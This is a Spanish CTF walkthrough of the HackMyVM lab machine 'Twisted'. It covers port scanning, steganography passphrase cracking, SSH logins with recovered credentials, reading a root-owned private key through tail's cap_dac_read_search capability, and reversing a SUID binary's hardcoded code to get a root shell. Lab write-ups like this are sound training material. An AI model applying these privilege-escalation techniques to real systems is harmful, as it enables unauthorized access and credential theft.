cd ~/blog

~/writeups/hmv/090-twisted.md

090 - Twisted

easy Linux hmv 10-09-2025
Steganography (stegseek)Linux Capabilities Privesc (tail cap_dac_read_search)SUID binary reverse engineering (ghidra)
hackmyvm.eu/machines/machine.php?vm=Twisted

~1 min de lectura


Identificamos la IP de la víctima:

 arp-scan --interface=wlo1 --localnet | grep PCS | awk '{print $1}'
192.168.1.66

Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.66
[sudo] contraseña para wh01s17:
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-30 15:10 -0400
Nmap scan report for 192.168.1.66
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
2222/tcp open  EtherNetIP-1
MAC Address: 08:00:27:B0:2F:A6 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
 nmap -sCV -p 80,2222 -oN 02-targeted.txt 192.168.1.66
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-30 15:11 -0400
Nmap scan report for 192.168.1.66
Host is up (0.00025s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
|   256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_  256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.27 seconds

Ingresamos la sitio web, y encontramos 2 imágenes, las cuales contenían mensajes ocultos con steg:

 stegseek -wl ~/Documentos/wordlists/rockyou.txt cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".
 stegseek -wl ~/Documentos/wordlists/rockyou.txt cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".

Utilizamos los nombres de los archivos como usuarios y su contenido como password, y nos conectamos por ssh:

markus:markuslovesbonita
mateo:thisismypassword
 ssh mateo@192.168.1.66 -p 2222
mateo@192.168.1.66\'s password: thisismypassword
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 30 15:19:07 2025 from 192.168.1.7
mateo@twisted:~$
 ssh markus@192.168.1.66 -p 2222
markus@192.168.1.66\'s password: markuslovesbonita
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$

En el home de ambos encontramos unas notas:

markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav

La nota de markus, hace referencia a una id_rsa, pero no tenemos permisos de lectura:

markus@twisted:~$ ls -l /var/cache/apt/id_rsa
-rw------- 1 root root 1823 Oct 14  2020 /var/cache/apt/id_rsa

Listamos las capabilities:

markus@twisted:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

El comando tail, cuenta con capabilities especiales, cap_dac_read_search, la cuál permite ignorar los permisos DAC (Discretionary Access Control), por lo que podemos leer cualquier archivo sin importar los permisos establecidos.

Utilizamos tail para leer el contenido del fichero id_rsa:

markus@twisted:~$ tail /var/cache/apt/id_rsa -n 30
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

Utilizamos esta id_rsa para conectarnos como el usuario bonita y obtenemos la primera flag:

 ssh bonita@192.168.1.66 -p 2222 -i id_rsa_bonita
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bonita@twisted:~$

Dentro del home de bonita, encontramos un binario llamado beroot con permisos SUID, que al ejecutar nos solicita un código:

bonita@twisted:~$ ./beroot
Enter the code:

Transferimos el binario a nuestra máquina para su análisis:

bonita@twisted:~$ python3 -m http.server
 wget http://192.168.1.66:8000/beroot

Abrimos ghidra y cargamos el binario para realizar ingeniería inversa y buscar la línea donde se verifica el código:

undefined8 main(void)

{
  int local_c;

  printf("Enter the code:\n ");
  scanf("%i",&local_c);
  if (local_c == 0x16f8) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
  }
  else {
    puts("\nWRONG");
  }
  return 0;
}

Vemos que se realiza la comparación con el valor en hexadecimal 0x16f8, el cuál convertimos en decimal:

 printf "%d" 0x16f8
5880

Ejecutamos nuevamente el binario e ingresamos el código:

bonita@twisted:~$ ./beroot
Enter the code:
5880
root@twisted:~#

Obtenemos una shell del usuario root, la última flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados